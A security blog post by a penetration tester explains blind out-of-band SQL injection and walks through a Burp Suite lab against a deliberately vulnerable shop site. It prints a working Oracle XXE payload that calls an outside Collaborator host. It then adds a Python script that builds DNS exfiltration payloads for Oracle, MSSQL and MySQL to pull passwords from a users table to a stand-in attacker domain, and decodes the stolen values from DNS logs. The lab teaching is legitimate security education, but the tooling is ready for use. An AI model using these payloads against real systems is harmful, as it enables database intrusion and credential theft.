Greetings everyone! Hope everything is going well!
In this post we look at how blind out-of-band (OOB) SQL injection works and what an attacker can achieve with it, and then walk through a complete practical session. Even if this class of attack is not new to you, the hands-on part should still be useful.
Out-of-band SQL injection exists for the same reason as any other SQL injection, a lack of input validation on the web application, but it differs in how the result comes back. Instead of reading the result in the HTTP response, the attacker makes the database server itself open an outbound connection, over DNS or HTTP, to a host the attacker controls, and the data travels on that channel. This is why OOB techniques are used for blind injection: when the injected query produces no visible difference in page content, response time or error message, an interaction arriving at the attacker's server is still a reliable way to verify the vulnerability and, by placing query results inside the requested hostname or URL, to exfiltrate data.
The outbound request is triggered by database functions that touch the file system or the network: file-operation functions such as MySQL's load_file() and MSSQL's master..xp_dirtree (pointed at a UNC path, which forces a name lookup of the host part), or connection functions such as Oracle's DBMS_LDAP.INIT and UTL_HTTP.REQUEST.
Is your website vulnerable to blind SQLi with OOB? Two conditions have to hold:
- Weak or missing input validation, so attacker-controlled input reaches a SQL query.
- A network environment that lets the database server initiate outbound requests over protocols such as DNS or HTTP to the public internet, with no egress filtering at the security perimeter. DNS is the channel that most often slips through: a database host with no direct internet access can usually still resolve names through an internal resolver that forwards queries outward.
How to test for blind out-of-band SQLi:
In the demonstration below we use Burp Collaborator against our target domain. Collaborator gives us a unique external hostname; if a payload injected into the application makes the database server resolve or fetch that hostname, the interaction appears in the Collaborator client, and that interaction alone verifies the vulnerability. No output from the query is needed.
Our lab is a vulnerable shop website that is known to be vulnerable to blind SQLi with OOB. As shown above, the home page lists several products; clicking any of them takes you to that product's page.
To see the HTTP request and response for that page, which makes the testing phase much easier, we capture the outgoing request with Burp Suite.
In the captured request (picture above) there is a TrackingId parameter. That is the parameter vulnerable to SQL injection with OOB.
To check it, we use the Burp Collaborator client, shown in the picture below, to generate the external hostname for the interaction.
We copy the server address from the Collaborator client and place it in an OOB SQL payload, which we use as the TrackingId value (as above):
x'+UNION+SELECT+extractvalue(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f><!DOCTYPE+root+[+<!ENTITY+%25+remote+SYSTEM+"http%3a//efxwhrpyejj3chvcyq47dny970dq1f.burpcollaborator.net/">+%25remote%3b]>'),'/l')+FROM+dual--
This payload targets an Oracle database (FROM dual, xmltype). It closes the original string with x', appends a UNION SELECT, and hands xmltype() an XML document that declares an external parameter entity pointing at our Collaborator URL. When Oracle's XML parser resolves that entity, the database server itself makes an HTTP request (preceded by a DNS lookup) to the Collaborator host. The characters ?, =, %, : and ; are URL-encoded and spaces are sent as + so the payload survives the request intact.
The server still responds with a 200, which on its own tells us nothing: that is the normal response for a blind injection. The evidence is in the Collaborator client, which records both the DNS lookup and the HTTP request that the target made for our hostname. That confirms the domain is vulnerable to OOB SQL injection: the SQL payload made the database server interact with our external server.
The same channel carries data out. If the payload concatenates the result of a sub-select into the hostname (for example as the leftmost label of a Collaborator subdomain), the value appears in the lookups logged by your DNS server or by Collaborator, and reading the exfiltrated information is just a matter of checking those logs.
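To make the mechanics concrete, here is an added example in Python (my own code, not the lab's or Burp's) that builds the Oracle verification probe used above, the matching DNS exfiltration payloads for Oracle, MSSQL (xp_dirtree) and MySQL (load_file), which goes beyond the single Oracle payload in the walkthrough, encodes them for the TrackingId parameter, and decodes exfiltrated values back out of DNS log lines. The domain oob.example.net, the users table with a password column, and the two log lines are all made up for the example; substitute your Collaborator hostname and the real table names.

```python
"""
Out-of-band SQL injection helpers: build the verification probe and DNS
exfiltration payloads for Oracle, MSSQL and MySQL, encode them for the
TrackingId parameter, and decode the data that comes back in DNS lookups.
Added example, not the lab's or Burp's code. The domain, the `users`
table and the log lines below are made up.
"""
import re
import urllib.parse

# Assumed attacker-controlled domain (stand-in for a Collaborator hostname).
COLLAB = "oob.example.net"


def oracle_xxe_probe(host=COLLAB):
    """Verification probe from the walkthrough: the XML parser behind
    xmltype() resolves the external parameter entity, so the database
    server itself fetches http://host/ and the interaction is logged."""
    xml = ('<?xml version="1.0" encoding="UTF-8"?>'
           f'<!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://{host}/"> %remote;]>')
    return f"x' UNION SELECT extractvalue(xmltype('{xml}'),'/l') FROM dual--"


def oracle_dns_exfil(subquery, host=COLLAB):
    """Exfiltration: the sub-select result, hex-encoded so it is a legal
    DNS label, is concatenated in as the leftmost label of the hostname.
    Values longer than 31 bytes exceed the 63-char label limit and would
    need to be chunked with SUBSTR."""
    hexed = f"RAWTOHEX(UTL_RAW.CAST_TO_RAW(({subquery})))"
    xml = ("'<?xml version=\"1.0\" encoding=\"UTF-8\"?>"
           "<!DOCTYPE root [ <!ENTITY % remote SYSTEM \"http://'||"
           f"{hexed}||'.{host}/\"> %remote;]>'")
    return f"x' UNION SELECT extractvalue(xmltype({xml}),'/l') FROM dual--"


def mssql_dns_exfil(subquery, host=COLLAB):
    """master..xp_dirtree on a UNC path forces the server to resolve the
    host part of the path. CONVERT(..., 2) gives hex without the 0x prefix."""
    hexed = f"CONVERT(varchar(256), CONVERT(varbinary(128), ({subquery})), 2)"
    return (f"'; DECLARE @h varchar(512); SET @h = {hexed}; "
            f"EXEC('master..xp_dirtree ''\\\\' + @h + '.{host}\\a''')--")


def mysql_dns_exfil(subquery, host=COLLAB):
    r"""LOAD_FILE() on a UNC path (MySQL on Windows) triggers the same
    lookup. Backslashes are doubled because MySQL string literals escape
    them, so the SQL text carries '\\\\' for a UNC '\\'."""
    return (f"' UNION SELECT LOAD_FILE(CONCAT('\\\\\\\\', HEX(({subquery})), "
            f"'.{host}\\\\a'))--")


def as_tracking_param(payload):
    """Percent-encode everything so quotes, spaces, '%', ';' and '#'
    survive the trip in the TrackingId value."""
    return "TrackingId=" + urllib.parse.quote(payload, safe="")


# Pulls the hex label out of a lookup for <hex>.COLLAB; bare verification
# probes have no such label and are skipped.
LOG_RE = re.compile(r"(?i)\b([0-9a-f]{2,62})\." + re.escape(COLLAB))


def decode_dns_log(lines):
    """Recover the exfiltrated values from DNS interaction log lines."""
    found = []
    for line in lines:
        m = LOG_RE.search(line)
        if m and len(m.group(1)) % 2 == 0:
            found.append(bytes.fromhex(m.group(1)).decode("utf-8", "replace"))
    return found


# Constructed log lines in the shape of a Collaborator DNS interaction list.
SAMPLE_LOG = [
    "2024-05-01 10:02:11 DNS lookup of type A for oob.example.net from 203.0.113.7",
    "2024-05-01 10:02:14 DNS lookup of type A for 733363726574.oob.example.net "
    "from 203.0.113.7",
]

if __name__ == "__main__":
    print(as_tracking_param(oracle_xxe_probe()))
    print(oracle_dns_exfil("SELECT password FROM users WHERE username='administrator'"))
    print(mssql_dns_exfil("SELECT TOP 1 password FROM users"))
    print(mysql_dns_exfil("SELECT password FROM users LIMIT 1"))
    print(decode_dns_log(SAMPLE_LOG))  # ['s3cret']
```

The hex step matters in practice: a raw password such as "p@ss word" is not a valid DNS label and the lookup never leaves the resolver, whereas its hex form is plain alphanumerics. The decoder ignores the bare probe line and only unhexes labels of even length, so a stray lookup from a scanner does not turn into garbage output.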
Conclusion: In this post we discussed how blind SQLi works with the help of OOB requests, and verified in practice that an out-of-band interaction with an external server is enough to confirm, and then exploit, an injection against the target even when the query returns no output at all.
Thanks for reading. See you in another blog!
Author
Pallab Jyoti Borah
VAPT Analyst